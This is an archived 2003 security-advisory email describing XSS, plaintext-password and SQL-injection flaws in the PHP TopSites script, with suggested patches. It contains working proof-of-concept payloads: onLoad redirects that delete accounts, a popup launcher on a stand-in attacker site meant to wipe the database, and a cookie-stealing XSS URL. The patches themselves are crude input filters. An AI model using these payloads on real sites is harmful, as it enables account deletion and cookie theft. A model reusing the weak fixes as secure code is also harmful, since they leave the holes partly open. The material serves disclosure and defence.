[UNIX] Multiple Vulnerabilities Found in PHP "Topsites"

From: support@securiteam.com
Date: 01/21/03

  • Next message: support@securiteam.com: "[TOOL] Malloc() WebMiner, Web Server File and Directory Enumerator (Miner)" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 21 Jan 2003 18:00:55 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Multiple Vulnerabilities Found in PHP "Topsites"
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.itop10.net/products/> PHP TopSites is a PHP/MySQL-based
    customizable TopList script. Main features include: Easy configuration
    config file; MySQL database backend; unlimited categories, Site rating on
    incoming votes; Special Rating from Webmaster; anti-cheating gateway;
    Random link; Lost password function; Webmaster Site-approval; Edit site;
    ProcessingTime display; Cookies Anti- Cheating; Site Reviews; Linux Cron
    Free; Frame Protection and much more.

    Multiple security vulnerabilities have been found in the product and they
    are listed below.

    DETAILS

    Critical XSS Vulnerability in all versions of PHP TopSites
    Script:
     * Add.php

    Because PHP TopSites does not have session authentication, it allows an
    attacker to use an XSS vulnerability to do things like delete, edit, and
    change user accounts by having an unknowingly admin run the code. Further,
    by putting is in the description field (while adding a new website), it
    would be almost impossible for any admin not to run the code.

    The following code is executed when the admin loads the page. He doesn't
    have to do anything but load the page.

    Examples:
    <body onLoad=
    "parent.location='http://www.somewebsite.com/TopSitesdirectory/seditor.php?sid=siteidnumber&a=delete
     
    This code will effectively delete the user account with the site id number
    as soon as the admin loads the page.
     
    <body onLoad="window.open('http://attackerswebsite/launcher.htm')">
     
    Using this code, an attacker can open a popup window to a page on his site
    that contains code of several more popup windows. Each window can be used
    to delete a site from the PHP TopSites database. By utilizing this method
    you can completely clear the TopSites database.
     
    Patch:
    To fix this vulnerability open add.php and find:
     if (!$name) { $err.= "Please enter your name.<BR>"; }
    if (!$passw) { $err.= "Please enter password.<BR>"; }
    if (!$email) { $err.= "Please enter your email address.<BR>"; }
    if (!$title) { $err.= "Please enter site title.<BR>"; }
    if (!$url) { $err.= "Please enter site url.<BR>"; }
    if (!$banner_w) { $err.= "Please enter banner width.<BR>"; }
    if (!$banner_h) { $err.= "Please enter banner height.<BR>"; }
    if (!$description) { $err.= "Please enter site description.<BR>"; }
    if (!$category) { $err.= "Please enter site category.<BR>"; }
    if (check_email_addr($email) == 0) { $err.= "Please enter valid email
    address.<BR>"; }
     
    Replace it with:
    ///////////////////////////////////////////////////////////////////////////
    // Critical XSS Vuln Fix By JeiAr = (jeiar@kmfms.com) January 12 2003 -
    All Versions PHP Topsites //
    ///////////////////////////////////////////////////////////////////////////
     
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $name)) {$err.= "Please enter A
    valid Name.<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $passw)) {$err.= "Please enter A
    valid Password<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $title)) {$err.= "Please enter A
    valid Title<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $linkback)) {$err.= "Please enter A
    valid Linkback<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $url)) {$err.= "Please enter A
    valid URL<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_url)) {$err.= "Please enter
    A valid Banner URL<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_w)) {$err.= "Please enter A
    valid Banner Width<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_h)) {$err.= "Please enter A
    valid Banner Height<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $description)) {$err.= "Please
    enter A valid Description<BR>";}
    if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $category)) {$err.= "Please enter A
    valid Category<BR>";}
    ///////////////////////////////////////////////////////////////////////////

    XSS Vulnerability in all versions of PHP TopSites
    Script:
     * help.php

    Because PHP TopSites does not have session authentication, it allows an
    attacker to use an XSS vulnerability steal cookies or other user-supplied
    information. The following example illustrates the vulnerability found in
    help.php.

    Example:
    http://somewebsitesite/TopSitesdirectory/help.php?sid=>alert(document.cookie)</script>

    Plaintext Password Disclosure Vulnerability in all versions of PHP
    TopSites
    Script:
     * seditor.php

    No current versions of PHP TopSites encrypt user passwords, and these
    plaintext passwords can be viewed by anyone with access to the admin panel
    or edit.php page.

    Any Topsite Admin (or intruder) can possibly use the user supplied
    password to try and compromise the security of the user supplied website
    and or the user supplied email account.

    Therefore, anyone signing up for a TopList using PHP TopSites should keep
    this in mind, and it should also be noted to anyone using the same
    password for everything, that this is generally not a very good habit to
    have.

    This vulnerability affects all versions. A suggestion to the developer
    would be to crypt the passes via md5, and not allow the password to be
    displayed to an admin when editing a TopList user(s).
     
    PHP TopSites User Account Compromise Vulnerability in All Pro versions and
    in 1.xx Free versions
    Script:
     * edit.php

    This is exploitable if the following two conditions are met:
    First, register_globals parameter is on in php.ini, which automatically
    turns every variable into a global variable.
    Second, the underlying database is MySQL, which does not require numeric
    criteria in the SQL statement to be quoted.

    If the two are met, an attacker to bypass the magic_quoted_gpcs protection
    in PHP that manipulates the numeric parts of a query.

    In edit.php. Examples are listed below.
    http://examplewebsite.com/topsitesdirectory/edit.php?a=pre&submit=&sid=siteidnumber
     
    This SQL injection negates the use of a password and provides access to
    the TopList edit page. All information about a particular site can be
    viewed and edited from this page.

    One thing to note, the password is displayed as plaintext on this page
    also. All users of the 1.XX Free script(s) are urged to upgrade their
    scripts as soon as possible. If you are not able to upgrade, the below
    code should serve as a quick fix.

    Patch:
    In the Edit.php file change:
    $query = mysql_db_query ($dbname,"Select * from top_user Where sid=$sid
    AND password='$passw'",$db) or die (mysql_error());
     
    To:
     
    $query = mysql_db_query ($dbname,"Select * from top_user Where
    sid='$sid'AND password='$passw'",$db) or die (mysql_error());

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:paragod@phreaker.net>
    Cyberarmy Application and Code Auditing Team.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages